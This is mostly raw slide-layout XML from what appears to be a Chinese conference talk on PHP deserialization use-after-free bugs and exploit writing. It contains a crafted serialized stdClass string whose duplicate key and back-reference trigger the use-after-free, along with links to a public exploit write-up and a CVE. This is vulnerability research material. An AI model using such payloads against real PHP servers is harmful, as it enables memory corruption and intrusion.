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61" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="258" r:id="rId5"/>
    <p:sldId id="265" r:id="rId6"/>
    <p:sldId id="266" r:id="rId7"/>
    <p:sldId id="267" r:id="rId8"/>
    <p:sldId id="259" r:id="rId9"/>
    <p:sldId id="278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60" r:id="rId20"/>
    <p:sldId id="262" r:id="rId21"/>
    <p:sldId id="263" r:id="rId22"/>
    <p:sldId id="264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88" r:id="rId33"/>
    <p:sldId id="290" r:id="rId34"/>
    <p:sldId id="291" r:id="rId35"/>
    <p:sldId id="292" r:id="rId36"/>
    <p:sldId id="293" r:id="rId37"/>
    <p:sldId id="297" r:id="rId38"/>
    <p:sldId id="294" r:id="rId39"/>
    <p:sldId id="298" r:id="rId40"/>
    <p:sldId id="295" r:id="rId41"/>
    <p:sldId id="299" r:id="rId42"/>
    <p:sldId id="300" r:id="rId43"/>
    <p:sldId id="301" r:id="rId44"/>
    <p:sldId id="303" r:id="rId45"/>
    <p:sldId id="302" r:id="rId46"/>
    <p:sldId id="304" r:id="rId47"/>
    <p:sldId id="305" r:id="rId48"/>
    <p:sldId id="306" r:id="rId49"/>
    <p:sldId id="307" r:id="rId50"/>
    <p:sldId id="309" r:id="rId51"/>
    <p:sldId id="308" r:id="rId52"/>
    <p:sldId id="279" r:id="rId53"/>
    <p:sldId id="310" r:id="rId5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8886A-6221-418A-B1E3-55A4981839FC}" type="datetimeFigureOut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3CB98-23D6-4872-BAC3-FF2520F70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7627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3CB98-23D6-4872-BAC3-FF2520F7085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277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PHP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使用这个结构来存储变量的所有数据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3CB98-23D6-4872-BAC3-FF2520F70851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5034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3CB98-23D6-4872-BAC3-FF2520F70851}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/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631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A6027-E2FA-4782-AC40-BD79739342BF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82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5426-FB84-4561-88EE-369DD22137F6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849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3BA3-02DC-4324-8295-C60F73E672BF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885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FDC7-AB02-4DF7-954D-A8AE3E174BC0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796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79CE-C97C-49D5-9099-8AE9008E5D6B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41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6411-9EF6-4732-9FCA-36E1F9AB9CEE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662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5DE2-F9AA-42D5-AFA7-33FA9845F742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596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E4FE-2B7B-4D76-900A-46C4709916EA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72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C206-909E-45FE-B636-288130A46EF4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75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1FA9-6AAF-42FB-BEAC-FA044422B282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132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B26A-D515-4F03-974F-75991F9C236F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033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CB2B2-8958-4431-B1B1-F570C28EF573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BBEDC-048B-4890-961E-082E285FAC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164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pwning/public-writeup/blob/master/hitcon2015/web500-use-after-flee/exploit.php" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8142" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.inulledmyself.com/2015/05/exploiting-memory-corruption-bugs-in.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.sina.com.cn/s/blog_4c9ba28501000ar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lideshare.net/i0n1c/syscan-singapore-2010-returning-into-the-phpinterpreter" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.php-internals.com/book/?p=chapt06/06-02-php-memory-manager" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.php-internals.com/book/?p=chapt03/03-01-00-variables-structure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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>UAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞的研究与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>编写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知道创宇 牛保龙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18C8-9A8E-470D-AF74-2202617CE0BD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4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970" y="1715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O:8:"stdClass":3:{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a: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6278563" y="817563"/>
            <a:ext cx="5913437" cy="3843337"/>
            <a:chOff x="3955" y="515"/>
            <a:chExt cx="3725" cy="2421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3955" y="515"/>
              <a:ext cx="3725" cy="2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6507" y="1285"/>
              <a:ext cx="905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507" y="1285"/>
              <a:ext cx="905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6925" y="1283"/>
              <a:ext cx="1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9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6507" y="1467"/>
              <a:ext cx="905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6507" y="1467"/>
              <a:ext cx="905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6925" y="146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6507" y="1649"/>
              <a:ext cx="905" cy="181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6507" y="1649"/>
              <a:ext cx="905" cy="181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6507" y="1830"/>
              <a:ext cx="905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6507" y="1830"/>
              <a:ext cx="905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6507" y="2012"/>
              <a:ext cx="905" cy="181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6507" y="2012"/>
              <a:ext cx="905" cy="181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507" y="2193"/>
              <a:ext cx="905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6507" y="2193"/>
              <a:ext cx="905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507" y="2375"/>
              <a:ext cx="905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6507" y="2375"/>
              <a:ext cx="905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507" y="2557"/>
              <a:ext cx="905" cy="181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6507" y="2557"/>
              <a:ext cx="905" cy="181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507" y="2738"/>
              <a:ext cx="905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6507" y="2738"/>
              <a:ext cx="905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3973" y="1649"/>
              <a:ext cx="905" cy="181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3973" y="1649"/>
              <a:ext cx="905" cy="181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4878" y="1649"/>
              <a:ext cx="904" cy="181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878" y="1649"/>
              <a:ext cx="904" cy="181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3973" y="1830"/>
              <a:ext cx="905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3973" y="1830"/>
              <a:ext cx="905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3973" y="2012"/>
              <a:ext cx="905" cy="181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3973" y="2012"/>
              <a:ext cx="905" cy="181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4878" y="1830"/>
              <a:ext cx="904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4878" y="1830"/>
              <a:ext cx="904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878" y="2012"/>
              <a:ext cx="904" cy="181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4878" y="2012"/>
              <a:ext cx="904" cy="181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4154" y="943"/>
              <a:ext cx="1448" cy="633"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1448 w 1448"/>
                <a:gd name="T1" fmla="*/ 379 h 633"/>
                <a:gd name="T2" fmla="*/ 1448 w 1448"/>
                <a:gd name="T3" fmla="*/ 0 h 633"/>
                <a:gd name="T4" fmla="*/ 0 w 1448"/>
                <a:gd name="T5" fmla="*/ 0 h 633"/>
                <a:gd name="T6" fmla="*/ 0 w 1448"/>
                <a:gd name="T7" fmla="*/ 379 h 633"/>
                <a:gd name="T8" fmla="*/ 543 w 1448"/>
                <a:gd name="T9" fmla="*/ 379 h 633"/>
                <a:gd name="T10" fmla="*/ 724 w 1448"/>
                <a:gd name="T11" fmla="*/ 633 h 633"/>
                <a:gd name="T12" fmla="*/ 905 w 1448"/>
                <a:gd name="T13" fmla="*/ 379 h 633"/>
                <a:gd name="T14" fmla="*/ 1448 w 1448"/>
                <a:gd name="T15" fmla="*/ 379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48" h="633">
                  <a:moveTo>
                    <a:pt x="1448" y="379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="379"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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4154" y="943"/>
              <a:ext cx="1448" cy="633"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1448 w 1448"/>
                <a:gd name="T1" fmla="*/ 379 h 633"/>
                <a:gd name="T2" fmla="*/ 1448 w 1448"/>
                <a:gd name="T3" fmla="*/ 0 h 633"/>
                <a:gd name="T4" fmla="*/ 0 w 1448"/>
                <a:gd name="T5" fmla="*/ 0 h 633"/>
                <a:gd name="T6" fmla="*/ 0 w 1448"/>
                <a:gd name="T7" fmla="*/ 379 h 633"/>
                <a:gd name="T8" fmla="*/ 543 w 1448"/>
                <a:gd name="T9" fmla="*/ 379 h 633"/>
                <a:gd name="T10" fmla="*/ 724 w 1448"/>
                <a:gd name="T11" fmla="*/ 633 h 633"/>
                <a:gd name="T12" fmla="*/ 905 w 1448"/>
                <a:gd name="T13" fmla="*/ 379 h 633"/>
                <a:gd name="T14" fmla="*/ 1448 w 1448"/>
                <a:gd name="T15" fmla="*/ 379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48" h="633">
                  <a:moveTo>
                    <a:pt x="1448" y="379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="633"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905" y="379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="379"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="20638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4506" y="985"/>
              <a:ext cx="881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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>stdClass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auto">
            <a:xfrm>
              <a:off x="6217" y="543"/>
              <a:ext cx="1448" cy="670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1448 w 1448"/>
                <a:gd name="T1" fmla="*/ 380 h 670"/>
                <a:gd name="T2" fmla="*/ 1448 w 1448"/>
                <a:gd name="T3" fmla="*/ 0 h 670"/>
                <a:gd name="T4" fmla="*/ 0 w 1448"/>
                <a:gd name="T5" fmla="*/ 0 h 670"/>
                <a:gd name="T6" fmla="*/ 0 w 1448"/>
                <a:gd name="T7" fmla="*/ 380 h 670"/>
                <a:gd name="T8" fmla="*/ 543 w 1448"/>
                <a:gd name="T9" fmla="*/ 380 h 670"/>
                <a:gd name="T10" fmla="*/ 724 w 1448"/>
                <a:gd name="T11" fmla="*/ 670 h 670"/>
                <a:gd name="T12" fmla="*/ 905 w 1448"/>
                <a:gd name="T13" fmla="*/ 380 h 670"/>
                <a:gd name="T14" fmla="*/ 1448 w 1448"/>
                <a:gd name="T15" fmla="*/ 38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48" h="670">
                  <a:moveTo>
                    <a:pt x="1448" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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auto">
            <a:xfrm>
              <a:off x="6217" y="543"/>
              <a:ext cx="1448" cy="670"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1448 w 1448"/>
                <a:gd name="T1" fmla="*/ 380 h 670"/>
                <a:gd name="T2" fmla="*/ 1448 w 1448"/>
                <a:gd name="T3" fmla="*/ 0 h 670"/>
                <a:gd name="T4" fmla="*/ 0 w 1448"/>
                <a:gd name="T5" fmla="*/ 0 h 670"/>
                <a:gd name="T6" fmla="*/ 0 w 1448"/>
                <a:gd name="T7" fmla="*/ 380 h 670"/>
                <a:gd name="T8" fmla="*/ 543 w 1448"/>
                <a:gd name="T9" fmla="*/ 380 h 670"/>
                <a:gd name="T10" fmla="*/ 724 w 1448"/>
                <a:gd name="T11" fmla="*/ 670 h 670"/>
                <a:gd name="T12" fmla="*/ 905 w 1448"/>
                <a:gd name="T13" fmla="*/ 380 h 670"/>
                <a:gd name="T14" fmla="*/ 1448 w 1448"/>
                <a:gd name="T15" fmla="*/ 38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48" h="670">
                  <a:moveTo>
                    <a:pt x="1448" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="905" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1448" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="20638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6507" y="586"/>
              <a:ext cx="296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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>v</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ar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6828" y="586"/>
              <a:ext cx="239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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>_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6942" y="586"/>
              <a:ext cx="56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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>hash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Line 45"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5267" y="1358"/>
              <a:ext cx="1131" cy="177"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="20638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5189" y="1488"/>
              <a:ext cx="96" cy="89"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 96"/>
                <a:gd name="T1" fmla="*/ 89 h 89"/>
                <a:gd name="T2" fmla="*/ 0 w 96"/>
                <a:gd name="T3" fmla="*/ 59 h 89"/>
                <a:gd name="T4" fmla="*/ 82 w 96"/>
                <a:gd name="T5" fmla="*/ 0 h 89"/>
                <a:gd name="T6" fmla="*/ 96 w 96"/>
                <a:gd name="T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89">
                  <a:moveTo>
                    <a:pt x="96" y="89"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="89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8BAE-E59C-4C2B-B021-F53400E54996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812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970" y="1715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O:8:"stdClass":3:{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:"aaa";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a:5:{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>s:3:"aaa";i:1;s:3:"ccc";R:5;}</a:t>
            </a:r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2255838" y="817563"/>
            <a:ext cx="9936162" cy="3849687"/>
            <a:chOff x="1421" y="515"/>
            <a:chExt cx="6259" cy="2425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21" y="515"/>
              <a:ext cx="6259" cy="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6511" y="1287"/>
              <a:ext cx="906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6511" y="1287"/>
              <a:ext cx="906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6929" y="1285"/>
              <a:ext cx="1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9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6511" y="1469"/>
              <a:ext cx="906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6511" y="1469"/>
              <a:ext cx="906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6929" y="1465"/>
              <a:ext cx="173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9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6511" y="1651"/>
              <a:ext cx="906" cy="181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6511" y="1651"/>
              <a:ext cx="906" cy="181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6511" y="1832"/>
              <a:ext cx="906" cy="183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6511" y="1832"/>
              <a:ext cx="906" cy="183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6511" y="2015"/>
              <a:ext cx="906" cy="181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6511" y="2015"/>
              <a:ext cx="906" cy="181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6511" y="2196"/>
              <a:ext cx="906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6511" y="2196"/>
              <a:ext cx="906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6511" y="2378"/>
              <a:ext cx="906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6511" y="2378"/>
              <a:ext cx="906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6511" y="2560"/>
              <a:ext cx="906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6511" y="2560"/>
              <a:ext cx="906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6511" y="2742"/>
              <a:ext cx="906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6511" y="2742"/>
              <a:ext cx="906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3975" y="1651"/>
              <a:ext cx="906" cy="181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3975" y="1651"/>
              <a:ext cx="906" cy="181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4322" y="1647"/>
              <a:ext cx="316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9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aaa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4881" y="1651"/>
              <a:ext cx="905" cy="181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4881" y="1651"/>
              <a:ext cx="905" cy="181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5176" y="1647"/>
              <a:ext cx="432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9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array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3975" y="1832"/>
              <a:ext cx="906" cy="183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3975" y="1832"/>
              <a:ext cx="906" cy="183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3975" y="2015"/>
              <a:ext cx="906" cy="181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3975" y="2015"/>
              <a:ext cx="906" cy="181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4881" y="1832"/>
              <a:ext cx="905" cy="183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4881" y="1832"/>
              <a:ext cx="905" cy="183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4881" y="2015"/>
              <a:ext cx="905" cy="181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4881" y="2015"/>
              <a:ext cx="905" cy="181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4156" y="943"/>
              <a:ext cx="1449" cy="635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1449 w 1449"/>
                <a:gd name="T1" fmla="*/ 380 h 635"/>
                <a:gd name="T2" fmla="*/ 1449 w 1449"/>
                <a:gd name="T3" fmla="*/ 0 h 635"/>
                <a:gd name="T4" fmla="*/ 0 w 1449"/>
                <a:gd name="T5" fmla="*/ 0 h 635"/>
                <a:gd name="T6" fmla="*/ 0 w 1449"/>
                <a:gd name="T7" fmla="*/ 380 h 635"/>
                <a:gd name="T8" fmla="*/ 543 w 1449"/>
                <a:gd name="T9" fmla="*/ 380 h 635"/>
                <a:gd name="T10" fmla="*/ 725 w 1449"/>
                <a:gd name="T11" fmla="*/ 635 h 635"/>
                <a:gd name="T12" fmla="*/ 906 w 1449"/>
                <a:gd name="T13" fmla="*/ 380 h 635"/>
                <a:gd name="T14" fmla="*/ 1449 w 1449"/>
                <a:gd name="T15" fmla="*/ 380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49" h="635">
                  <a:moveTo>
                    <a:pt x="1449" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1449" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1449" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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4156" y="943"/>
              <a:ext cx="1449" cy="635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1449 w 1449"/>
                <a:gd name="T1" fmla="*/ 380 h 635"/>
                <a:gd name="T2" fmla="*/ 1449 w 1449"/>
                <a:gd name="T3" fmla="*/ 0 h 635"/>
                <a:gd name="T4" fmla="*/ 0 w 1449"/>
                <a:gd name="T5" fmla="*/ 0 h 635"/>
                <a:gd name="T6" fmla="*/ 0 w 1449"/>
                <a:gd name="T7" fmla="*/ 380 h 635"/>
                <a:gd name="T8" fmla="*/ 543 w 1449"/>
                <a:gd name="T9" fmla="*/ 380 h 635"/>
                <a:gd name="T10" fmla="*/ 725 w 1449"/>
                <a:gd name="T11" fmla="*/ 635 h 635"/>
                <a:gd name="T12" fmla="*/ 906 w 1449"/>
                <a:gd name="T13" fmla="*/ 380 h 635"/>
                <a:gd name="T14" fmla="*/ 1449 w 1449"/>
                <a:gd name="T15" fmla="*/ 380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49" h="635">
                  <a:moveTo>
                    <a:pt x="1449" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1449" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1449" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="20638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4508" y="985"/>
              <a:ext cx="882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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>stdClass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6221" y="543"/>
              <a:ext cx="1449" cy="671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1449 w 1449"/>
                <a:gd name="T1" fmla="*/ 380 h 671"/>
                <a:gd name="T2" fmla="*/ 1449 w 1449"/>
                <a:gd name="T3" fmla="*/ 0 h 671"/>
                <a:gd name="T4" fmla="*/ 0 w 1449"/>
                <a:gd name="T5" fmla="*/ 0 h 671"/>
                <a:gd name="T6" fmla="*/ 0 w 1449"/>
                <a:gd name="T7" fmla="*/ 380 h 671"/>
                <a:gd name="T8" fmla="*/ 543 w 1449"/>
                <a:gd name="T9" fmla="*/ 380 h 671"/>
                <a:gd name="T10" fmla="*/ 725 w 1449"/>
                <a:gd name="T11" fmla="*/ 671 h 671"/>
                <a:gd name="T12" fmla="*/ 906 w 1449"/>
                <a:gd name="T13" fmla="*/ 380 h 671"/>
                <a:gd name="T14" fmla="*/ 1449 w 1449"/>
                <a:gd name="T15" fmla="*/ 38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49" h="671">
                  <a:moveTo>
                    <a:pt x="1449" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1449" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1449" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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6221" y="543"/>
              <a:ext cx="1449" cy="671"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1449 w 1449"/>
                <a:gd name="T1" fmla="*/ 380 h 671"/>
                <a:gd name="T2" fmla="*/ 1449 w 1449"/>
                <a:gd name="T3" fmla="*/ 0 h 671"/>
                <a:gd name="T4" fmla="*/ 0 w 1449"/>
                <a:gd name="T5" fmla="*/ 0 h 671"/>
                <a:gd name="T6" fmla="*/ 0 w 1449"/>
                <a:gd name="T7" fmla="*/ 380 h 671"/>
                <a:gd name="T8" fmla="*/ 543 w 1449"/>
                <a:gd name="T9" fmla="*/ 380 h 671"/>
                <a:gd name="T10" fmla="*/ 725 w 1449"/>
                <a:gd name="T11" fmla="*/ 671 h 671"/>
                <a:gd name="T12" fmla="*/ 906 w 1449"/>
                <a:gd name="T13" fmla="*/ 380 h 671"/>
                <a:gd name="T14" fmla="*/ 1449 w 1449"/>
                <a:gd name="T15" fmla="*/ 38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49" h="671">
                  <a:moveTo>
                    <a:pt x="1449" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1449" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1449" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="20638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6511" y="586"/>
              <a:ext cx="296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900" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>v</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="zh-CN" altLang="zh-CN" sz="2900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ar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6832" y="586"/>
              <a:ext cx="240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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>_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6947" y="586"/>
              <a:ext cx="565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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>hash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Line 47"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
